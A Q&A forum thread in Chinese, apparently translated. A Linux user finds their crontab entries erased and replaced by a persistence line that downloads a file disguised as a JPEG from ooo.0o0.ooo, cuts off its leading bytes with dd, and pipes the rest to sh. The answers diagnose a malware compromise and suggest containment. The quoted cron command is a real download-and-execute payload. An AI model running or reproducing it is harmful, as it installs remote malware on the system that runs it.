我的 Linux 中的 Crontab 条目每天都会被删除。我添加了这些条目,第二天当我检查时我能找到的是:
*/60 * * * * curl https://ooo.0o0.ooo/2017/01/21/58837a6d11262.jpg -k|dd skip=3458 bs=1|sh
同时 root 用户中的 crontab 条目仍然存在。
答案1
下载 shell 脚本(同样以 JPEG 形式伪装)并运行它的 crontab 条目强烈表明您的系统已受到损害。您应该关闭受影响的计算机,并询问您的 IT 团队如何处理它。
(这种妥协可以解释你消失的 crontab 条目——大概是你无意中托管的任何恶意软件都会重写 crontab。)
答案2
您的系统已感染“lady linux”病毒,您确实需要优化安全性。检查文件夹“/tmp”中是否有神秘文件,并阻止不使用的 TCP/UDP 端口,并阻止服务器的出站目的地 ooo.0o0.ooo。不过应该很难找到问题根源。